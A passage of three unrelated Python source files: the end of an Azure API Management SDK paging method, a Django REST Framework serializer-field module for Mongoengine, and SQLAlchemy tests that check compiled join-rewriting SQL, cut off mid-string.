endswith |</br>| productId | filter | ge, le, eq, ne, gt, lt | substringof, contains,
startswith, endswith |</br>| state | filter | eq | |</br>| user | expand | |
|</br>.
:type filter: str
:param top: Number of records to return.
:type top: int
:param skip: Number of records to skip.
:type skip: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SubscriptionCollection or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~api_management_client.models.SubscriptionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SubscriptionCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
service_name=service_name,
product_id=product_id,
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
skip=skip,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
service_name=service_name,
product_id=product_id,
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
skip=skip,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SubscriptionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/products/{productId}/subscriptions'} # type: ignore
| |
from django.core.exceptions import ValidationError
from django.utils.encoding import smart_str
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from bson.errors import InvalidId
from mongoengine import dereference
from mongoengine.base.document import BaseDocument
from mongoengine.document import Document
from mongoengine.fields import ObjectId
class DocumentField(serializers.Field):
"""
Base field for Mongoengine fields that we can not convert to DRF fields.
To Users:
- You can subclass DocumentField to implement custom (de)serialization
"""
type_label = 'DocumentField'
def __init__(self, *args, **kwargs):
try:
self.model_field = kwargs.pop('model_field')
except KeyError:
raise ValueError("%s requires 'model_field' kwarg" % self.type_label)
super(DocumentField, self).__init__(*args, **kwargs)
def transform_document(self, document, depth):
data = {}
# serialize each required field
for field in document._fields:
if hasattr(document, smart_str(field)):
# finally check for an attribute 'field' on the instance
obj = getattr(document, field)
else:
continue
val = self.transform_object(obj, depth-1)
if val is not None:
data[field] = val
return data
def transform_dict(self, obj, depth):
return dict([(key, self.transform_object(val, depth-1))
for key, val in obj.items()])
def transform_object(self, obj, depth):
"""
Models to natives
Recursion for (embedded) objects
"""
if isinstance(obj, BaseDocument):
# Document, EmbeddedDocument
if depth == 0:
# Return primary key if exists, else return default text
return smart_str(getattr(obj, 'pk', 'Max recursion depth exceeded'))
return self.transform_document(obj, depth)
elif isinstance(obj, dict):
# Dictionaries
return self.transform_dict(obj, depth)
elif isinstance(obj, list):
# List
return [self.transform_object(value, depth) for value in obj]
elif obj is None:
return None
else:
return smart_str(obj) if isinstance(obj, ObjectId) else obj
def to_internal_value(self, data):
return self.model_field.to_python(data)
def to_representation(self, value):
return self.transform_object(value, 1)
class ReferenceField(DocumentField):
"""
For ReferenceField.
We always dereference DBRef object before serialization
TODO: Maybe support DBRef too?
"""
default_error_messages = {
'invalid_dbref': _('Unable to convert to internal value.'),
'invalid_doc': _('DBRef invalid dereference.'),
}
type_label = 'ReferenceField'
def __init__(self, *args, **kwargs):
self.depth = kwargs.pop('depth')
super(ReferenceField, self).__init__(*args, **kwargs)
def to_internal_value(self, data):
try:
dbref = self.model_field.to_python(data)
except InvalidId:
raise ValidationError(self.error_messages['invalid_dbref'])
instance = dereference.DeReference()([dbref])[0]
# Check if dereference was successful
if not isinstance(instance, Document):
msg = self.error_messages['invalid_doc']
raise ValidationError(msg)
return instance
def to_representation(self, value):
return self.transform_object(value, self.depth - 1)
class ListField(DocumentField):
type_label = 'ListField'
def __init__(self, *args, **kwargs):
self.depth = kwargs.pop('depth')
super(ListField, self).__init__(*args, **kwargs)
def to_internal_value(self, data):
return self.model_field.to_python(data)
def to_representation(self, value):
return self.transform_object(value, self.depth - 1)
class EmbeddedDocumentField(DocumentField):
type_label = 'EmbeddedDocumentField'
def __init__(self, *args, **kwargs):
try:
self.document_type = kwargs.pop('document_type')
except KeyError:
raise ValueError("EmbeddedDocumentField requires 'document_type' kwarg")
super(EmbeddedDocumentField, self).__init__(*args, **kwargs)
def to_representation(self, value):
if value is None:
return None
else:
return self.transform_object(value, self.depth)
def to_internal_value(self, data):
return self.model_field.to_python(data)
class DynamicField(DocumentField):
type_label = 'DynamicField'
def __init__(self, field_name=None, source=None, *args, **kwargs):
super(DynamicField, self).__init__(*args, **kwargs)
self.field_name = field_name
self.source = source
if source:
self.source_attrs = self.source.split('.')
def to_representation(self, value):
return self.model_field.to_python(value)
class ObjectIdField(DocumentField):
type_label = 'ObjectIdField'
def to_representation(self, value):
return smart_str(value)
def to_internal_value(self, data):
return ObjectId(data)
class BinaryField(DocumentField):
type_label = 'BinaryField'
def __init__(self, **kwargs):
try:
self.max_bytes = kwargs.pop('max_bytes')
except KeyError:
raise ValueError('BinaryField requires "max_bytes" kwarg')
super(BinaryField, self).__init__(**kwargs)
def to_representation(self, value):
return smart_str(value)
def to_internal_value(self, data):
return super(BinaryField, self).to_internal_value(smart_str(data))
class BaseGeoField(DocumentField):
type_label = 'BaseGeoField'
| |
"""These tests are all about the "join rewriting" feature built
to support SQLite's lack of right-nested joins. SQLite as of
version 3.7.16 no longer has this limitation.
"""
from sqlalchemy import Column
from sqlalchemy import exists
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import literal_column
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import union
from sqlalchemy import util
from sqlalchemy.engine import default
from sqlalchemy.sql import elements
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
m = MetaData()
a = Table("a", m, Column("id", Integer, primary_key=True))
b = Table(
"b",
m,
Column("id", Integer, primary_key=True),
Column("a_id", Integer, ForeignKey("a.id")),
)
b_a = Table("b_a", m, Column("id", Integer, primary_key=True))
b1 = Table(
"b1",
m,
Column("id", Integer, primary_key=True),
Column("a_id", Integer, ForeignKey("a.id")),
)
b2 = Table(
"b2",
m,
Column("id", Integer, primary_key=True),
Column("a_id", Integer, ForeignKey("a.id")),
)
a_to_b = Table(
"a_to_b",
m,
Column("a_id", Integer, ForeignKey("a.id")),
Column("b_id", Integer, ForeignKey("b.id")),
)
c = Table(
"c",
m,
Column("id", Integer, primary_key=True),
Column("b_id", Integer, ForeignKey("b.id")),
)
d = Table(
"d",
m,
Column("id", Integer, primary_key=True),
Column("c_id", Integer, ForeignKey("c.id")),
)
e = Table("e", m, Column("id", Integer, primary_key=True))
f = Table(
"f",
m,
Column("id", Integer, primary_key=True),
Column("a_id", ForeignKey("a.id")),
)
b_key = Table("b_key", m, Column("id", Integer, primary_key=True, key="bid"))
a_to_b_key = Table(
"a_to_b_key",
m,
Column("aid", Integer, ForeignKey("a.id")),
Column("bid", Integer, ForeignKey("b_key.bid")),
)
class _JoinRewriteTestBase(AssertsCompiledSQL):
def _test(self, s, assert_):
self.assert_compile(s, assert_)
compiled = s.compile(dialect=self.__dialect__)
for rec, (name, col) in zip(
compiled._result_columns, s._columns_plus_names
):
assert col in set(rec[2])
if (
not isinstance(name, elements._anonymous_label)
and name is not None
):
eq_(rec[1], name)
_a_bkeyselect_bkey = ""
def test_a_bkeyselect_bkey(self):
assoc = a_to_b_key.select().alias()
j1 = assoc.join(b_key)
j2 = a.join(j1)
s = select([a, b_key], use_labels=True).select_from(j2)
self._test(s, self._a_bkeyselect_bkey)
def test_a_bc(self):
j1 = b.join(c)
j2 = a.join(j1)
# TODO: if we remove 'b' or 'c', shouldn't we get just
# the subset of cols from anon_1 ?
# TODO: do this test also with individual cols, things change
# lots based on how you go with this
s = (
select([a, b, c], use_labels=True)
.select_from(j2)
.where(b.c.id == 2)
.where(c.c.id == 3)
.order_by(a.c.id, b.c.id, c.c.id)
)
self._test(s, self._a_bc)
def test_a_bc_preserve_dupes(self):
j1 = b.join(c)
j2 = a.join(j1)
s = (
select(
[a.c.id, b.c.id, b.c.a_id, c, b.c.a_id, c.c.b_id],
use_labels=True,
)
.select_from(j2)
.where(b.c.id == 2)
.where(c.c.id == 3)
.order_by(a.c.id, b.c.id, c.c.id)
)
self._test(s, self._a_bc_wdupes)
def test_a_bc_preserve_dupes_anon_map(self):
j1 = b.join(c)
j2 = a.join(j1)
s = (
select(
[a.c.id, b.c.id, b.c.a_id, c, b.c.a_id, c.c.b_id],
use_labels=True,
)
.select_from(j2)
.where(b.c.id == 2)
.where(c.c.id == 3)
)
# the anon_map needs to be preserved after the transform
# as the labels are going to be referred to outside of the query
subq = s.subquery()
s2 = (
select([literal_column("1")])
.select_from(subq)
.where(subq.c[5] == subq.c[6])
)
self._test(s2, self._a_bc_wdupes_anon_map)
def test_a_bkeyassoc(self):
j1 = b_key.join(a_to_b_key)
j2 = a.join(j1)
s = select([a, b_key.c.bid], use_labels=True).select_from(j2)
self._test(s, self._a_bkeyassoc)
def test_a_bkeyassoc_aliased(self):
bkey_alias = b_key.alias()
a_to_b_key_alias = a_to_b_key.alias()
j1 = bkey_alias.join(a_to_b_key_alias)
j2 = a.join(j1)
s = select([a, bkey_alias.c.bid], use_labels=True).select_from(j2)
self._test(s, self._a_bkeyassoc_aliased)
def test_a__b_dc(self):
j1 = c.join(d)
j2 = b.join(j1)
j3 = a.join(j2)
s = (
select([a, b, c, d], use_labels=True)
.select_from(j3)
.where(b.c.id == 2)
.where(c.c.id == 3)
.where(d.c.id == 4)
.order_by(a.c.id, b.c.id, c.c.id, d.c.id)
)
self._test(s, self._a__b_dc)
def test_a_bc_comma_a1_selbc(self):
# test here we're emulating is
# test.orm.inheritance.test_polymorphic_rel:
# PolymorphicJoinsTest.test_multi_join
j1 = b.join(c)
j2 = b.join(c).select(use_labels=True).alias()
j3 = a.join(j1)
a_a = a.alias()
j4 = a_a.join(j2)
s = (
select([a, a_a, b, c, j2], use_labels=True)
.select_from(j3)
.select_from(j4)
.order_by(j2.c.b_id)
)
self._test(s, self._a_bc_comma_a1_selbc)
def test_a_atobalias_balias_c_w_exists(self):
a_to_b_alias = a_to_b.alias()
b_alias = b.alias()
j1 = a_to_b_alias.join(b_alias)
j2 = a.outerjoin(j1, a.c.id == a_to_b_alias.c.a_id)
# TODO: if we put straight a_to_b_alias here,
# it fails to alias the columns clause.
s = select(
[
a,
a_to_b_alias.c.a_id,
a_to_b_alias.c.b_id,
b_alias.c.id,
b_alias.c.a_id,
exists()
.select_from(c)
.where(c.c.b_id == b_alias.c.id)
.label(None),
],
use_labels=True,
).select_from(j2)
self._test(s, self._a_atobalias_balias_c_w_exists)
def test_a_atobalias_balias(self):
a_to_b_alias = a_to_b.alias()
b_alias = b.alias()
j1 = a_to_b_alias.join(b_alias)
j2 = a.outerjoin(j1, a.c.id == a_to_b_alias.c.a_id)
s = select([a, a_to_b_alias, b_alias], use_labels=True).select_from(j2)
self._test(s, self._a_atobalias_balias)
def test_b_ab1_union_b_ab2(self):
j1 = a.join(b1)
j2 = a.join(b2)
b_j1 = b.join(j1)
b_j2 = b.join(j2)
s = (
union(
select([b_j1], use_labels=True),
select([b_j2], use_labels=True),
)
.subquery()
.select(use_labels=True)
)
self._test(s, self._b_ab1_union_c_ab2)
def test_b_a_id_double_overlap_annotated(self):
# test issue #3057
# this involves annotations so try to loop those in.
j1 = b.join(b_a, b.c.id == b_a.c.id)
annot = [
b.c.id._annotate({}),
b.c.a_id._annotate({}),
b_a.c.id._annotate({}),
]
s = select(annot).select_from(j1).apply_labels().alias()
s = select(list(s.c)).apply_labels()
self._test(s, self._b_a_id_double_overlap_annotated)
def test_f_b1a_where_in_b2a(self):
# test issue #3130
b1a = a.join(b1)
b2a = a.join(b2)
subq = select([b2.c.id]).select_from(b2a)
s = select([f]).select_from(f.join(b1a)).where(b1.c.id.in_(subq))
s = s.apply_labels()
self._test(s, self._f_b1a_where_in_b2a)
def test_anon_scalar_subqueries(self):
s1 = select([1]).scalar_subquery()
s2 = select([2]).scalar_subquery()
s = select([s1, s2]).apply_labels()
self._test(s, self._anon_scalar_subqueries)
class JoinRewriteTest(_JoinRewriteTestBase, fixtures.TestBase):
"""test rendering of each join with right-nested rewritten as
aliased SELECT statements.."""
@util.classproperty
def __dialect__(cls):
dialect = default.DefaultDialect()
dialect.supports_right_nested_joins = False
return dialect
_a__b_dc = (
"SELECT a.id AS a_id, anon_1.b_id AS b_id, "
"anon_1.b_a_id AS b_a_id, anon_1.c_id AS c_id, "
"anon_1.c_b_id AS c_b_id, anon_1.d_id AS d_id, "
"anon_1.d_c_id AS d_c_id "
"FROM a JOIN (SELECT b.id AS b_id, b.a_id AS b_a_id, "
"anon_2.c_id AS c_id, anon_2.c_b_id AS c_b_id, "
"anon_2.d_id AS d_id, anon_2.d_c_id AS d_c_id "
"FROM b JOIN (SELECT c.id AS c_id, c.b_id AS c_b_id, "
"d.id AS d_id, d.c_id AS d_c_id "
"FROM c JOIN d ON c.id = d.c_id) AS anon_2 "
"ON b.id = anon_2.c_b_id) AS anon_1 ON a.id = anon_1.b_a_id "
"WHERE anon_1.b_id = :id_1 AND anon_1.c_id = :id_2 AND "
"anon_1.d_id = :id_3 "
"ORDER BY a.id, anon_1.b_id, anon_1.c_id, anon_1.d_id"
)
_a_bc = (
"SELECT a.id AS a_id, anon_1.b_id AS b_id, "
"anon_1.b_a_id AS b_a_id, anon_1.c_id AS c_id, "
"anon_1.c_b_id AS c_b_id FROM a JOIN "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id "
"FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
"ON a.id = anon_1.b_a_id "
"WHERE anon_1.b_id = :id_1 AND anon_1.c_id = :id_2 "
"ORDER BY a.id, anon_1.b_id, anon_1.c_id"
)
_a_bc_wdupes = (
"SELECT a.id AS a_id, anon_1.b_id AS b_id, anon_1.b_a_id AS b_a_id, "
"anon_1.c_id AS c_id, anon_1.c_b_id AS c_b_id, "
"anon_1.b_a_id AS b_a_id_1, anon_1.c_b_id AS c_b_id_1 "
"FROM a JOIN "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, c.id AS c_id, "
"c.b_id AS c_b_id "
"FROM b JOIN c ON b.id = c.b_id) AS anon_1 ON a.id = anon_1.b_a_id "
"WHERE anon_1.b_id = :id_1 AND anon_1.c_id = :id_2 "
"ORDER BY a.id, anon_1.b_id, anon_1.c_id"
)
_a_bc_wdupes_anon_map = (
"SELECT 1 FROM (SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id, b.a_id AS b_a_id_1, "
"c.b_id AS c_b_id_1 "
"FROM a JOIN (b JOIN c ON b.id = c.b_id) ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2) AS anon_1 "
"WHERE anon_1.b_a_id_1 = anon_1.c_b_id_1"
)
_a_bc_wdupes_anon_map = (
"SELECT 1 FROM (SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id, b.a_id AS b_a_id_1, "
"c.b_id AS c_b_id_1 FROM a JOIN (b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id WHERE b.id = :id_1 AND c.id = :id_2) AS anon_1 "
"WHERE anon_1.b_a_id_1 = anon_1.c_b_id_1"
)
_a_bc_comma_a1_selbc = (
"SELECT a.id AS a_id, a_1.id AS a_1_id, anon_1.b_id AS b_id, "
"anon_1.b_a_id AS b_a_id, anon_1.c_id AS c_id, "
"anon_1.c_b_id AS c_b_id, anon_2.b_id AS anon_2_b_id, "
"anon_2.b_a_id AS anon_2_b_a_id, anon_2.c_id AS anon_2_c_id, "
"anon_2.c_b_id AS anon_2_c_b_id FROM a "
"JOIN (SELECT b.id AS b_id, b.a_id AS b_a_id, c.id AS c_id, "
"c.b_id AS c_b_id FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
"ON a.id = anon_1.b_a_id, "
"a AS a_1 JOIN "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id "
"FROM b JOIN c ON b.id = c.b_id) AS anon_2 "
"ON a_1.id = anon_2.b_a_id ORDER BY anon_2.b_id"
)
_a_bkeyassoc = (
"SELECT a.id AS a_id, anon_1.b_key_id AS b_key_id "
"FROM a JOIN "
"(SELECT b_key.id AS b_key_id, a_to_b_key.aid AS a_to_b_key_aid, "
"a_to_b_key.bid AS a_to_b_key_bid FROM b_key "
"JOIN a_to_b_key ON b_key.id = a_to_b_key.bid) AS anon_1 "
"ON a.id = anon_1.a_to_b_key_aid"
)
_a_bkeyassoc_aliased = (
"SELECT a.id AS a_id, anon_1.b_key_1_id AS b_key_1_id "
"FROM a JOIN (SELECT b_key_1.id AS b_key_1_id, "
"a_to_b_key_1.aid AS a_to_b_key_1_aid, "
"a_to_b_key_1.bid AS a_to_b_key_1_bid FROM b_key AS b_key_1 "
"JOIN a_to_b_key AS a_to_b_key_1 ON b_key_1.id = a_to_b_key_1.bid) AS "
"anon_1 ON a.id = anon_1.a_to_b_key_1_aid"
)
_a_bkeyselect_bkey = (
"SELECT a.id AS a_id, anon_1.b_key_id AS b_key_id "
"FROM a JOIN (SELECT anon_2.aid AS anon_2_aid, "
"anon_2.bid AS anon_2_bid, "
"b_key.id AS b_key_id "
"FROM (SELECT a_to_b_key.aid AS aid, a_to_b_key.bid AS bid "
"FROM a_to_b_key) AS anon_2 "
"JOIN b_key ON b_key.id = anon_2.bid) AS anon_1 "
"ON a.id = anon_1.anon_2_aid"
)
_a_atobalias_balias_c_w_exists = (
"SELECT a.id AS a_id, "
"anon_1.a_to_b_1_a_id AS a_to_b_1_a_id, "
"anon_1.a_to_b_1_b_id AS a_to_b_1_b_id, "
"anon_1.b_1_id AS b_1_id, anon_1.b_1_a_id AS b_1_a_id, "
"EXISTS (SELECT * FROM c WHERE c.b_id = anon_1.b_1_id) AS anon_2 "
"FROM a LEFT OUTER JOIN (SELECT a_to_b_1.a_id AS a_to_b_1_a_id, "
"a_to_b_1.b_id AS a_to_b_1_b_id, b_1.id AS b_1_id, "
"b_1.a_id AS b_1_a_id "
"FROM a_to_b AS a_to_b_1 "
"JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) AS anon_1 "
"ON a.id = anon_1.a_to_b_1_a_id"
)
_a_atobalias_balias = (
"SELECT a.id AS a_id, anon_1.a_to_b_1_a_id AS a_to_b_1_a_id, "
"anon_1.a_to_b_1_b_id AS a_to_b_1_b_id, anon_1.b_1_id AS b_1_id, "
"anon_1.b_1_a_id AS b_1_a_id FROM a LEFT OUTER JOIN "
"(SELECT a_to_b_1.a_id AS a_to_b_1_a_id, "
"a_to_b_1.b_id AS a_to_b_1_b_id, "
"b_1.id AS b_1_id, b_1.a_id AS b_1_a_id FROM a_to_b AS a_to_b_1 "
"JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) AS anon_1 "
"ON a.id = anon_1.a_to_b_1_a_id"
)
_b_ab1_union_c_ab2 = (
"SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
"anon_1.a_id AS anon_1_a_id, anon_1.b1_id AS anon_1_b1_id, "
"anon_1.b1_a_id AS anon_1_b1_a_id FROM "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, anon_2.a_id AS a_id, "
"anon_2.b1_id AS b1_id, anon_2.b1_a_id AS b1_a_id "
"FROM b JOIN (SELECT a.id AS a_id, b1.id AS b1_id, b1.a_id AS b1_a_id "
"FROM a JOIN b1 ON a.id = b1.a_id) AS anon_2 ON anon_2.a_id = b.a_id "
"UNION "
"SELECT b.id AS b_id, b.a_id AS b_a_id, anon_3.a_id AS a_id, "
"anon_3.b2_id AS b2_id, anon_3.b2_a_id AS b2_a_id "
"FROM b JOIN (SELECT a.id AS a_id, b2.id AS b2_id, b2.a_id AS b2_a_id "
"FROM a JOIN b2 ON a.id = b2.a_id) AS anon_3 ON anon_3.a_id = b.a_id) "
"AS anon_1"
)
_b_a_id_double_overlap_annotated = (
"SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
"anon_1.b_a_id_1 AS anon_1_b_a_id_1 "
"FROM (SELECT b.id AS b_id, b.a_id AS b_a_id, b_a.id AS b_a_id_2 "
"FROM b JOIN b_a ON b.id = b_a.id) AS anon_1"
)
_f_b1a_where_in_b2a = (
"SELECT f.id AS f_id, f.a_id AS f_a_id "
"FROM f JOIN (SELECT a.id AS a_id, b1.id AS b1_id, b1.a_id AS b1_a_id "
"FROM a JOIN b1 ON a.id = b1.a_id) AS anon_1 ON anon_1.a_id = f.a_id "
"WHERE anon_1.b1_id IN (SELECT b2.id "
"FROM a JOIN b2 ON a.id = b2.a_id)"
)
_anon_scalar_subqueries = (
"SELECT (SELECT 1) AS anon_1, (SELECT 2) AS anon_2"
)
class JoinPlainTest(_JoinRewriteTestBase, fixtures.TestBase):
"""test rendering of each join with normal nesting."""
@util.classproperty
def __dialect__(cls):
dialect = default.DefaultDialect()
return dialect
_a_bkeyselect_bkey = (
"SELECT a.id AS a_id, b_key.id AS b_key_id FROM a JOIN "
"((SELECT a_to_b_key.aid AS aid, a_to_b_key.bid AS bid "
"FROM a_to_b_key) AS anon_1 JOIN b_key ON b_key.id = anon_1.bid) "
"ON a.id = anon_1.aid"
)
_a__b_dc = (
"SELECT a.id AS a_id, b.id AS b_id, "
"b.a_id AS b_a_id, c.id AS c_id, "
"c.b_id AS c_b_id, d.id AS d_id, "
"d.c_id AS d_c_id "
"FROM a JOIN (b JOIN (c JOIN d ON c.id = d.c_id) "
"ON b.id = c.b_id) ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2 AND "
"d.id = :id_3 "
"ORDER BY a.id, b.id, c.id, d.id"
)
_a_bc = (
"SELECT a.id AS a_id, b.id AS b_id, "
"b.a_id AS b_a_id, c.id AS c_id, "
"c.b_id AS c_b_id FROM a JOIN "
"(b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2 "
"ORDER BY a.id, b.id, c.id"
)
_a_bc_wdupes = (
"SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, c.id AS c_id, "
"c.b_id AS c_b_id, b.a_id AS b_a_id_1, c.b_id AS c_b_id_1 "
"FROM a JOIN "
"(b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2 "
"ORDER BY a.id, b.id, c.id"
)
_a_bc_wdupes_anon_map = (
"SELECT 1 FROM (SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id, b.a_id AS b_a_id_1, "
"c.b_id AS c_b_id_1 "
"FROM a JOIN (b JOIN c ON b.id = c.b_id) ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2) AS anon_1 "
"WHERE anon_1.b_a_id_1 = anon_1.c_b_id_1"
)
_a_bc_comma_a1_selbc = (
"SELECT a.id AS a_id, a_1.id AS a_1_id, b.id AS b_id, "
"b.a_id AS b_a_id, c.id AS c_id, "
"c.b_id AS c_b_id, anon_1.b_id AS anon_1_b_id, "
"anon_1.b_a_id AS anon_1_b_a_id, anon_1.c_id AS anon_1_c_id, "
"anon_1.c_b_id AS anon_1_c_b_id FROM a "
"JOIN (b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id, "
"a AS a_1 JOIN "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id "
"FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
"ON a_1.id = anon_1.b_a_id ORDER BY anon_1.b_id"
)
_a_bkeyassoc = (
"SELECT a.id AS a_id, b_key.id AS b_key_id "
"FROM a JOIN "
"(b_key JOIN a_to_b_key ON b_key.id = a_to_b_key.bid) "
"ON a.id = a_to_b_key.aid"
)
_a_bkeyassoc_aliased = (
"SELECT a.id AS a_id, b_key_1.id AS b_key_1_id FROM a "
"JOIN (b_key AS b_key_1 JOIN a_to_b_key AS a_to_b_key_1 "
"ON b_key_1.id = a_to_b_key_1.bid) ON a.id = a_to_b_key_1.aid"
)
_a_atobalias_balias_c_w_exists = (
"SELECT a.id AS a_id, a_to_b_1.a_id AS a_to_b_1_a_id, "
"a_to_b_1.b_id AS a_to_b_1_b_id, b_1.id AS b_1_id, "
"b_1.a_id AS b_1_a_id, "
"EXISTS (SELECT * FROM c WHERE c.b_id = b_1.id) AS anon_1 "
"FROM a LEFT OUTER JOIN "
"(a_to_b AS a_to_b_1 JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) "
"ON a.id = a_to_b_1.a_id"
)
_a_atobalias_balias = (
"SELECT a.id AS a_id, a_to_b_1.a_id AS a_to_b_1_a_id, "
"a_to_b_1.b_id AS a_to_b_1_b_id, b_1.id AS b_1_id, "
"b_1.a_id AS b_1_a_id "
"FROM a LEFT OUTER JOIN (a_to_b AS a_to_b_1 "
"JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) ON a.id = a_to_b_1.a_id"
)
_b_ab1_union_c_ab2 = (
"SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
"anon_1.a_id AS anon_1_a_id, anon_1.b1_id AS anon_1_b1_id, "
"anon_1.b1_a_id AS anon_1_b1_a_id FROM "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, "
"b1.id AS b1_id, "
"b1.a_id AS b1_a_id FROM b "
"JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = b.a_id "
"UNION "
"SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, b2.id AS b2_id, "
"b2.a_id AS b2_a_id FROM b "
"JOIN (a JOIN b2 ON a.id = b2.a_id) ON a.id = b.a_id) AS anon_1"
)
_b_a_id_double_overlap_annotated = (
"SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
"anon_1.b_a_id_1 AS anon_1_b_a_id_1 FROM "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, b_a.id AS b_a_id_1 "
"FROM b JOIN b_a ON b.id = b_a.id) AS anon_1"
)
_f_b1a_where_in_b2a = (
"SELECT f.id AS f_id, f.a_id AS f_a_id "
"FROM f JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = f.a_id "
"WHERE b1.id IN (SELECT b2.id "
"FROM a JOIN b2 ON a.id = b2.a_id)"
)
_anon_scalar_subqueries = (
"SELECT (SELECT 1) AS anon_1, (SELECT 2) AS anon_2"
)
class JoinNoUseLabelsTest(_JoinRewriteTestBase, fixtures.TestBase):
@util.classproperty
def __dialect__(cls):
dialect = default.DefaultDialect()
dialect.supports_right_nested_joins = False
return dialect
def _test(self, s, assert_):
s.use_labels = False
self.assert_compile(s, assert_)
_a_bkeyselect_bkey = (
"SELECT a.id, b_key.id FROM a JOIN ((SELECT a_to_b_key.aid AS aid, "
"a_to_b_key.bid AS bid FROM a_to_b_key) AS anon_1 "
"JOIN b_key ON b_key.id = anon_1.bid) ON a.id = anon_1.aid"
)
_a__b_dc = (
"SELECT a.id, b.id, "
"b.a_id, c.id, "
"c.b_id, d.id, "
"d.c_id "
"FROM a JOIN (b JOIN (c JOIN d ON c.id = d.c_id) "
"ON b.id = c.b_id) ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2 AND "
"d.id = :id_3 "
"ORDER BY a.id, b.id, c.id, d.id"
)
_a_bc = (
"SELECT a.id, b.id, "
"b.a_id, c.id, "
"c.b_id FROM a JOIN "
"(b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2 "
"ORDER BY a.id, b.id, c.id"
)
_a_bc_wdupes = (
"SELECT a.id, b.id, b.a_id, c.id, c.b_id, b.a_id, c.b_id "
"FROM a JOIN "
"(b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2 "
"ORDER BY a.id, b.id, c.id"
)
_a_bc_wdupes_anon_map = (
"SELECT 1 FROM (SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id, b.a_id AS b_a_id_1, "
"c.b_id AS c_b_id_1 "
"FROM a JOIN (b JOIN c ON b.id = c.b_id) ON a.id = b.a_id "
"WHERE b.id = :id_1 AND c.id = :id_2) AS anon_1 "
"WHERE anon_1.b_a_id_1 = anon_1.c_b_id_1"
)
_a_bc_comma_a1_selbc = (
"SELECT a.id, a_1.id, b.id, "
"b.a_id, c.id, "
"c.b_id, anon_1.b_id, "
"anon_1.b_a_id, anon_1.c_id, "
"anon_1.c_b_id FROM a "
"JOIN (b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id, "
